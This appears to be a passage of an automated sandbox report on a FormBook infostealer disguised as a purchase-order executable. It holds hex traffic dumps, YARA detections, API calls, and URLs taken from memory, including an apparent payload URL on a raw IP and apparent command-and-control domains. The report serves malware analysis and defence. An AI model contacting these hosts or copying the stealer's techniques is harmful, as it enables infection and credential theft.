                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 08:13:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: W/"1f2b-59f878ddd2a87"Content-Encoding: gzipData Raw: 31 33 39 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 59 d9 af e3 d6 79 7f ae 01 ff 0f ea 35 0a 2f f2 1d 2e 12 b5 4c 66 a6 e5 26 8a 12 49 89 8b 16 12 05 02 8a a4 b8 2f a2 48 91 54 d1 3f 66 62 29 48 1b 23 31 92 34 b1 1b 07 2e 92 a0 75 9d c4 49 5a 38 28 52 20 41 db 97 da 49 5f 62 14 e8 63 0f 75 a5 7b c7 e3 31 ec e8 42 10 79 ce 77 be e5 f7 ad 97 7c f0 a7 d4 84 54 d4 29 dd 70 b2 30 78 f4 fc 73 0f ea df 46 a0 47 f6 c3 2b 4f bf 3a ad 58 ba 59 ff 86 56 a6 37 0c 47 4f b7 56 f6 f0 8a 9e 91 d7 a3 e9 55 03 aa b7 32 37 0b ac 47 6d b8 dd 18 b8 81 d5 10 e2 ac 31 88 f3 c8 7c 00 dd ec 5c 4e 47 7a 68 3d bc da b9 56 91 c4 69 76 d5 30 e2 28 b3 22 c0 ad 70 cd cc 79 68 5a 3b d7 b0 ae 4f 37 af ba 91 9b b9 7a 70 bd 35 f4 c0 7a 88 dc 83 5f 0d c1 52 98 87 77 2b 27 f5 b6 59 05 44 66 55 02 38 67 56 99 41 c6 76 5b 6f bc d2 f8 ab e7 9f 6b 80 4f a8 a7 b6 1b dd 6f c0 5f ba b9 4f 74 d3 74 23 fb 66 e1 af 9f 7f ce 0d ed 0b e9 2a 4e 4d 2b bd dd c9 83 cb c6 f9 cc 75 60 ad b3 fb 0d d4 0a 01 2f 70 f4 04 d6 59 4c bc b3 d2 75 10 17 d7 d5 fd c6 d6 48 e3 20 b8 a1 59 c5 66 75 61 b3 06 f6 5e af f5 d0 0d 00 d1 d5 f1 3f 8e 87 e3 47 c7 bf bd 7a b5 c1 5b 6e 5a c5 af 36 ae 5e fb d9 6b ff da 78 ed 17 c7 ef 1c bf 77 fc d1 f1 9b 60 eb 8a 97 1b 53 26 ce 1c d7 a8 ef 8e ff 72 fc f0 f8 8d e3 fb df fe e5 f1 3b 8d 69 1a 37 16 ad 7a 79 e8 a6 3a b0 32 6e 8c 75 3f 6f dc 90 d7 db 60 6f ab 47 db eb ad 95 ba eb 33 00 4f 03 12 b8 91 75 ed 58 ae ed 00 db 90 7b ed 33 d9 49 d9 ad bb b7 ee 37 ba d8 9f 9d 17 6b 84 af f5 c0 b5 01 a0 06 70 9d 95 9e 37 8c 38 88 01 72 a9 bd 7a 09 c5 b0 57 1b 48 bb f5 6a a3 d7 7a 19 6c d7 40 21 9f 80 e0 86 6b bb 9d 94 4f ca 2a ce 2a ac e2 c0 7c 72 fd 02 d8 d0 0a 76 56 e6 1a fa 33 6c 7a a6 5e b5 60 f4 22 f8 99 14 75 7c 9c ec fc 2c d9 37 9a 22 bd 93 a6 80 5f f2 c5 d8 9d 8f dd 19 f8 34 e6 4f 07 e1 3d ab 4c 02 dd 8d 2e ec 9f f2 09 76 c6 e3 c2 a6 05 27 65 43 cf b3 f8 bc 7e 46 ff 05 74 5d ff 81 45 a0 ea 0b 86 9e 6f ad 0b c3 27 cd af a3 f8 13 34 81 7b 21 fb 14 a3 5b 84 3e c3 a4 eb 55 9c 65 71 08 72 e6 1e 76 49 8b b3 e4 c0 bd 1f e8 db ec da 70 dc c0 bc 08 b8 b1 e0 ee d4 8d 1e 4e eb b2 1f 58 19 08 aa eb 6d a2 1b a7 24 45 3e 37 46 56 ba e1 db 69 5d 6e ee 37 5e 58 af ad 95 85 9c 51 b9 05 19 bb b8 ef 85 c2 71 33 eb cb ab b8 bc c8 bb 20 8a 00 9a 13 a2 b7 75 e2 8e ef f5 19 95 d3 e1 33 70 2b fd 0e db 3b ca fb 8d 27 68 ee ad e3 18 d8 f2 e5 ac cc 3e 25 0d f8 ef 93 4a de 22 52 bb f6 bc f5 b9 ce 40 6f ed 4a d2 eb 22 d5 6f a3 f3 62 15 7c 63 52 e7 86 27 08 8a e7 9f 83 5e 69 3c 7c c6 a7 de 6a 34 8e 6f 1d 7f f3 f8 ed e3 bb c7 0f 8e 7f 73 fc b8 5e 7b 06 69 bd d4 78 05 7a fe b9 bf 08 2d d3 d5 1b 71 14 54 75 c9 b3 ac a8 a1 47 66 e3 25 50 a8 6f 8a 38 88 8a 97 cf 4b 7a 79 59 ea 76 ba 49 f9 72 8d c8 0b 4f 82 78 eb ac 53 6c 23 75 80 63 b7 6a 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 08:13:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: W/"1f2b-59f878ddd2a87"Content-Encoding: gzipData Raw: 31 33 39 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 59 d9 af e3 d6 79 7f ae 01 ff 0f ea 35 0a 2f f2 1d 2e 12 b5 4c 66 a6 e5 26 8a 12 49 89 8b 16 12 05 02 8a a4 b8 2f a2 48 91 54 d1 3f 66 62 29 48 1b 23 31 92 34 b1 1b 07 2e 92 a0 75 9d c4 49 5a 38 28 52 20 41 db 97 da 49 5f 62 14 e8 63 0f 75 a5 7b c7 e3 31 ec e8 42 10 79 ce 77 be e5 f7 ad 97 7c f0 a7 d4 84 54 d4 29 dd 70 b2 30 78 f4 fc 73 0f ea df 46 a0 47 f6 c3 2b 4f bf 3a ad 58 ba 59 ff 86 56 a6 37 0c 47 4f b7 56 f6 f0 8a 9e 91 d7 a3 e9 55 03 aa b7 32 37 0b ac 47 6d b8 dd 18 b8 81 d5 10 e2 ac 31 88 f3 c8 7c 00 dd ec 5c 4e 47 7a 68 3d bc da b9 56 91 c4 69 76 d5 30 e2 28 b3 22 c0 ad 70 cd cc 79 68 5a 3b d7 b0 ae 4f 37 af ba 91 9b b9 7a 70 bd 35 f4 c0 7a 88 dc 83 5f 0d c1 52 98 87 77 2b 27 f5 b6 59 05 44 66 55 02 38 67 56 99 41 c6 76 5b 6f bc d2 f8 ab e7 9f 6b 80 4f a8 a7 b6 1b dd 6f c0 5f ba b9 4f 74 d3 74 23 fb 66 e1 af 9f 7f ce 0d ed 0b e9 2a 4e 4d 2b bd dd c9 83 cb c6 f9 cc 75 60 ad b3 fb 0d d4 0a 01 2f 70 f4 04 d6 59 4c bc b3 d2 75 10 17 d7 d5 fd c6 d6 48 e3 20 b8 a1 59 c5 66 75 61 b3 06 f6 5e af f5 d0 0d 00 d1 d5 f1 3f 8e 87 e3 47 c7 bf bd 7a b5 c1 5b 6e 5a c5 af 36 ae 5e fb d9 6b ff da 78 ed 17 c7 ef 1c bf 77 fc d1 f1 9b 60 eb 8a 97 1b 53 26 ce 1c d7 a8 ef 8e ff 72 fc f0 f8 8d e3 fb df fe e5 f1 3b 8d 69 1a 37 16 ad 7a 79 e8 a6 3a b0 32 6e 8c 75 3f 6f dc 90 d7 db 60 6f ab 47 db eb ad 95 ba eb 33 00 4f 03 12 b8 91 75 ed 58 ae ed 00 db 90 7b ed 33 d9 49 d9 ad bb b7 ee 37 ba d8 9f 9d 17 6b 84 af f5 c0 b5 01 a0 06 70 9d 95 9e 37 8c 38 88 01 72 a9 bd 7a 09 c5 b0 57 1b 48 bb f5 6a a3 d7 7a 19 6c d7 40 21 9f 80 e0 86 6b bb 9d 94 4f ca 2a ce 2a ac e2 c0 7c 72 fd 02 d8 d0 0a 76 56 e6 1a fa 33 6c 7a a6 5e b5 60 f4 22 f8 99 14 75 7c 9c ec fc 2c d9 37 9a 22 bd 93 a6 80 5f f2 c5 d8 9d 8f dd 19 f8 34 e6 4f 07 e1 3d ab 4c 02 dd 8d 2e ec 9f f2 09 76 c6 e3 c2 a6 05 27 65 43 cf b3 f8 bc 7e 46 ff 05 74 5d ff 81 45 a0 ea 0b 86 9e 6f ad 0b c3 27 cd af a3 f8 13 34 81 7b 21 fb 14 a3 5b 84 3e c3 a4 eb 55 9c 65 71 08 72 e6 1e 76 49 8b b3 e4 c0 bd 1f e8 db ec da 70 dc c0 bc 08 b8 b1 e0 ee d4 8d 1e 4e eb b2 1f 58 19 08 aa eb 6d a2 1b a7 24 45 3e 37 46 56 ba e1 db 69 5d 6e ee 37 5e 58 af ad 95 85 9c 51 b9 05 19 bb b8 ef 85 c2 71 33 eb cb ab b8 bc c8 bb 20 8a 00 9a 13 a2 b7 75 e2 8e ef f5 19 95 d3 e1 33 70 2b fd 0e db 3b ca fb 8d 27 68 ee ad e3 18 d8 f2 e5 ac cc 3e 25 0d f8 ef 93 4a de 22 52 bb f6 bc f5 b9 ce 40 6f ed 4a d2 eb 22 d5 6f a3 f3 62 15 7c 63 52 e7 86 27 08 8a e7 9f 83 5e 69 3c 7c c6 a7 de 6a 34 8e 6f 1d 7f f3 f8 ed e3 bb c7 0f 8e 7f 73 fc b8 5e 7b 06 69 bd d4 78 05 7a fe b9 bf 08 2d d3 d5 1b 71 14 54 75 c9 b3 ac a8 a1 47 66 e3 25 50 a8 6f 8a 38 88 8a 97 cf 4b 7a 79 59 ea 76 ba 49 f9 72 8d c8 0b 4f 82 78 eb ac 53 6c 23 75 80 63 b7 6a 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 08:13:42 GMTContent-Type: text/htmlContent-Length: 7979Connection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: "1f2b-59f878ddd2a87"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2a 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 7d 0d 0a 69 6d 67 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 7d 0d 0a 75 6c 20 7b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0d 0a 7d 0d 0a 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0d 0a 7d 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 31 34 33 2c 20 38 33 29 3b 0d 0a 7d 0d 0a 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 34 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 68 32 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 7d 0d 0a 70 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 7d 0d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 08:13:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 08:13:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 08:13:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 08:13:57 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                      Source: P.Order request for quotations.exe, 00000000.00000002.1034894237.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1280129644.00000000025E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.83.222
                      Source: P.Order request for quotations.exe, 00000000.00000002.1034894237.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1280129644.00000000025E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.83.222/win32/panel/uploads/Gdugwwjztt.pdf
                      Source: P.Order request for quotations.exe, HashSize.exe.0.drString found in binary or memory: http://196.251.83.222/win32/panel/uploads/Gdugwwjztt.pdfYX
                      Source: finger.exe, 00000005.00000002.3362990233.0000000004B3C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ibm-p8-kvm-03-guest-02.virt.pnr.lab.eng.rdu2.redhat.com/
                      Source: P.Order request for quotations.exe, 00000000.00000002.1034894237.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1280129644.00000000025E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3366174794.0000000006436000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.knowesis.app
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3366174794.0000000006436000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.knowesis.app/pzq1/
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3364508387.00000000057DE000.00000004.80000000.00040000.00000000.sdmp, finger.exe, 00000005.00000002.3362990233.0000000004CCE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://ad.netowl.jp/js/star-errorpage.js?date=
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3364508387.0000000004506000.00000004.80000000.00040000.00000000.sdmp, finger.exe, 00000005.00000002.3362990233.00000000039F6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://error.skycloud.tw/system/error?code=400
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: finger.exe, 00000005.00000002.3359394622.00000000028AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: finger.exe, 00000005.00000002.3359394622.00000000028AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: finger.exe, 00000005.00000003.1347173913.0000000007725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: finger.exe, 00000005.00000002.3359394622.00000000028AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: finger.exe, 00000005.00000002.3359394622.00000000028AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: finger.exe, 00000005.00000002.3359394622.00000000028AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: finger.exe, 00000005.00000002.3359394622.00000000028AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.0000000003669000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, P.Order request for quotations.exe, 00000000.00000002.1034894237.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.0000000003669000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1280129644.000000000267C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.0000000003669000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3364508387.00000000057DE000.00000004.80000000.00040000.00000000.sdmp, finger.exe, 00000005.00000002.3362990233.0000000004CCE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.star.ne.jp/

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 2.2.P.Order request for quotations.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.P.Order request for quotations.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3358405901.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3366174794.00000000063C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1160607644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3359171063.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1187484394.0000000004640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3358967031.00000000025B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3362082192.00000000029A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1170345518.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: P.Order request for quotations.exe
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_0669C780 NtResumeThread,0_2_0669C780
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_06698B00 NtProtectVirtualMemory,0_2_06698B00
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_0669C778 NtResumeThread,0_2_0669C778
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_06698AF9 NtProtectVirtualMemory,0_2_06698AF9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0042CE23 NtClose,2_2_0042CE23
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2B60 NtClose,LdrInitializeThunk,2_2_017B2B60
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_017B2DF0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_017B2C70
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B35C0 NtCreateMutant,LdrInitializeThunk,2_2_017B35C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B4340 NtSetContextThread,2_2_017B4340
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B4650 NtSuspendThread,2_2_017B4650
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2BF0 NtAllocateVirtualMemory,2_2_017B2BF0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2BE0 NtQueryValueKey,2_2_017B2BE0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2BA0 NtEnumerateValueKey,2_2_017B2BA0
